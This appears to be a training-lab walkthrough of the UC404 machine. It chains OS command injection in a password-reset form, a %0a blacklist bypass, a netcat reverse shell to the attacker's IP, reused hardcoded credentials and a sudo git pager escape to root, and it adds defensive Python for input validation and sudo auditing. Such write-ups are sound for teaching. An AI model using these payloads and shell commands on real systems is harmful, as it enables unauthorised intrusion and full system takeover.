Summary

On this machine, we'll leverage OS command injection in a web application to gain an initial foothold. We'll then leverage a password disclosure and a sudo misconfiguration to escalate our privileges.

Enumeration

Nmap

We start the enumeration process with a simple Nmap scan.

kali@kali:~$ sudo nmap 192.168.120.157
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-22 13:13 EDT
Nmap scan report for 192.168.120.157
Host is up (0.035s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
2049/tcp open  nfs
3128/tcp open  squid-http

Gobuster

Navigating to port 80 (http://192.168.120.157/), we find an application named AdminLTE3. We can use gobuster to brute-force the site's directories with the /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt wordlist.

kali@kali:~$ gobuster dir -u http://192.168.120.157 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -z
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
...
/docs (Status: 301)
/pages (Status: 301)
/demo (Status: 301)
/plugins (Status: 301)
/db (Status: 301)
/dist (Status: 301)
/build (Status: 301)
/LICENSE (Status: 200)
/under_construction (Status: 301)
...

This scan reveals a hidden /under_construction directory.

Web Enumeration

Navigating to the discovered directory, we find a login control and a Forgot Password? link. If we navigate there, we are presented with a form asking for an email address. The subtext reads:

By clicking "Reset Password" we will send a password reset link

Viewing the source code of the page reveals the following comment:

<!--
  ______ __  __          _____ _         _______     _______ _______ ______ __  __
 |  ____|  \/  |   /\   |_   _| |       / ____\ \   / / ____|__   __|  ____|  \/  |
 | |__  | \  / |  /  \    | | | |      | (___  \ \_/ / (___    | |  | |__  | \  / |
 |  __| | |\/| | / /\ \   | | | |       \___ \  \   / \___ \   | |  |  __| | |\/| |
 | |____| |  | |/ ____ \ _| |_| |____   ____) |  | |  ____) |  | |  | |____| |  | |
 |______|_|  |_/_/    \_\_____|______| |_____/   |_| |_____/   |_|  |______|_|  |_|

---- Under Construction ----

sendmail.php must receive the variable from the html form and send the message.

|| For security reasons we are working to blacklist some characters ||

//-->

Could not open input file: sendmail.php

This error is the message the PHP command-line interpreter prints when asked to run a script it cannot find. It tells us that the page is executing a system command that passes our input to sendmail.php, a file which does not exist on the server.

Exploitation

Command Injection

We'll set up our web browser to use the Burp proxy to intercept and analyze our traffic. Then, we'll test the functionality of this form by entering test@email.com into the email field and submitting the form.

The body of the captured request contains email=test%40email.com. This seems like a good candidate for command injection. Let's include the variable email in a GET request and inject ; followed by the command id:

<http://192.168.120.157/under_construction/forgot.php?email=;id>

According to the server response, this doesn't seem to work. It's possible that ; is one of the blacklisted characters. Researching OS command injection bypasses, we discover %0a, a URL-encoded newline, which the shell treats as a command separator just like ;. Let's test this with the following request:

<http://192.168.120.157/under_construction/forgot.php?email=%0aid>

The server response indicates that we have obtained remote code execution on the target.

HTTP/1.1 200 OK
Date: Thu, 22 Oct 2020 17:56:02 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding
Content-Length: 2783
Connection: close
Content-Type: text/html; charset=UTF-8
...
Could not open input file: sendmail.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
0
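The HTML comment above mentions a character blacklist, and the %0a request shows why that approach fails. As an added example (not code from the original post, and not the target's sendmail.php), the following Python contrasts such a deny-list with an allow-list validator and shows that passing the address as its own argv element, with no shell involved, keeps a newline from acting as a command separator. The blacklist set and the e-mail regex are assumptions.

```python
import ast
import re
import subprocess
import sys

# Assumed deny-list: the page only says "some characters" were blacklisted
# and that ';' was rejected, so this set is a constructed illustration.
BLACKLIST = set(";|&`$()")

# Assumed allow-list pattern for the one thing the form should accept.
EMAIL_RE = r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}"


def blacklist_allows(email: str) -> bool:
    """Deny-list check of the kind the HTML comment describes."""
    return not any(c in BLACKLIST for c in email)


def dollar_anchored_check(email: str) -> bool:
    """Looks strict, but '$' in re.match still matches before a trailing newline."""
    return re.match(EMAIL_RE + "$", email) is not None


def is_valid_email(email: str) -> bool:
    """Allow-list check: the entire string must be an address, nothing else."""
    return re.fullmatch(EMAIL_RE, email) is not None


def sendmail_argv(email: str) -> list:
    """Build the argv for 'php sendmail.php <email>' with no shell involved."""
    if not is_valid_email(email):
        raise ValueError("rejected: input is not an e-mail address")
    return ["php", "sendmail.php", email]


def argv_roundtrip(arg: str) -> str:
    """Run a child (this interpreter, as a stand-in for php) with shell=False
    and return the argument exactly as the child received it."""
    out = subprocess.run(
        [sys.executable, "-c", "import sys; print(repr(sys.argv[1]))", arg],
        capture_output=True, text=True, check=True,
    ).stdout
    return ast.literal_eval(out.strip())
```

A newline passes the deny-list untouched, and even a `$`-anchored regex accepts a trailing one; only the full-match allow-list plus an argv-based invocation closes the gap.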

Reverse Shell

A search for locally available commands leads us to netcat.

<http://192.168.120.157/under_construction/forgot.php?email=%0Awhich+nc>
...
/usr/bin/nc
...

We can easily obtain a reverse shell with netcat. Let's set up a listener on port 4444 and issue the following request (be sure to swap your IP address):

<http://192.168.120.157/under_construction/forgot.php?email=%0Anc%20192.168.118.3%204444%20-e%20%2Fbin%2Fbash>

This gives us a remote shell.

kali@kali:~$ nc -lvp 4444
listening on [any] 4444 ...
192.168.120.157: inverse host lookup failed: Unknown host
connect to [192.168.118.3] from (UNKNOWN) [192.168.120.157] 47038
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@UC404:/var/www/html/under_construction$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@UC404:/var/www/html/under_construction$

Escalation

Local Enumeration

Exploring the file system, we discover an interesting file: /var/backups/sendmail.php.bak.

www-data@UC404:/var/www/html/under_construction$ cd /var/backups
cd /var/backups
www-data@UC404:/var/backups$ ls -la
ls -la
total 28
drwxr-xr-x  2 root     root      4096 Oct 23 07:38 .
drwxr-xr-x 12 root     root      4096 Oct 22 11:16 ..
-rw-r--r--  1 www-data www-data   787 Sep 18 10:21 sendmail.php.bak
www-data@UC404:/var/backups$

The file contains the following code, which includes hardcoded database credentials:

www-data@UC404:/var/backups$ cat sendmail.php.bak
cat sendmail.php.bak
<?php
if(isset($_POST['submit']))
{
$connect=mysql_connect("localhost","brian","BrianIsOnTheAir789") or die("Could not connect to database");
mysql_select_db("uc404") or die(mysql_error());
...
?>www-data@UC404:/var/backups$

SSH

Let's verify these credentials with an SSH connection.

kali@kali:~$ ssh -o StrictHostKeyChecking=no brian@192.168.120.157
...
brian@UC404:~$ id
uid=1001(brian) gid=1001(brian) groups=1001(brian)
brian@UC404:~$

Abusing Git Functionality

We can begin our escalation process with a search for commands with elevated privileges.

brian@UC404:~$ sudo -l
Matching Defaults entries for brian on UC404:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User brian may run the following commands on UC404:
    (ALL) NOPASSWD: /usr/bin/git
brian@UC404:~$

It appears we can run /usr/bin/git as root without a password. We can abuse this to get a root shell. We'll start with the following command:

brian@UC404:~$ sudo git help config

This produces the following output:

GIT-CONFIG(1)                                         Git Manual                                         GIT-CONFIG(1)

NAME
       git-config - Get and set repository or global options

...

The manual page is displayed in a pager, whose status line reads Manual page git-config(1) line 1 (press h for help or q to quit). Since the pager is running as root, we can escape from it into a root shell by typing !/bin/sh followed by a return.

# id
uid=0(root) gid=0(root) groups=0(root)
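The sudo rule above is the root cause of this escalation: git is allowed as root, without a password, and nothing stops it from launching its pager. As an added example (not code from the original post), this Python audit parses sudo -l output like the one shown and flags the two conditions a reviewer would want changed. The sample text is a constructed copy of the page's output, and the set of pager-spawning binaries is an assumption limited to what the page demonstrates.

```python
import re

# Constructed copy of the 'sudo -l' output shown in the walkthrough.
SAMPLE_SUDO_L = """\
Matching Defaults entries for brian on UC404:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User brian may run the following commands on UC404:
    (ALL) NOPASSWD: /usr/bin/git
"""

# Assumed set: binaries that open an interactive pager on their own.
# git is the one this page demonstrates (git help drops into the pager).
PAGER_SPAWNERS = {"/usr/bin/git"}

# One sudoers rule line: "(runas) TAG: TAG: command [args]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_rules(sudo_l_output: str) -> list:
    """Return (runas, tags, command) for each rule after the 'may run' header."""
    rules, in_rules = [], False
    for line in sudo_l_output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if m:
            tags = {t.rstrip(":") for t in m.group("tags").split()}
            rules.append((m.group("runas").strip(), tags, m.group("cmd").strip()))
    return rules


def audit(sudo_l_output: str) -> list:
    """Flag passwordless rules and pager-spawning binaries granted without NOEXEC."""
    findings = []
    for runas, tags, cmd in parse_rules(sudo_l_output):
        if "NOPASSWD" in tags:
            findings.append(f"{cmd}: runs as ({runas}) without a password")
        if cmd.split()[0] in PAGER_SPAWNERS and "NOEXEC" not in tags:
            findings.append(f"{cmd}: can spawn a pager and lacks the NOEXEC tag")
    return findings
```

The NOEXEC tag makes sudo block dynamically linked programs from executing further programs, which is what the pager escape relies on; removing the git rule altogether is the simpler fix.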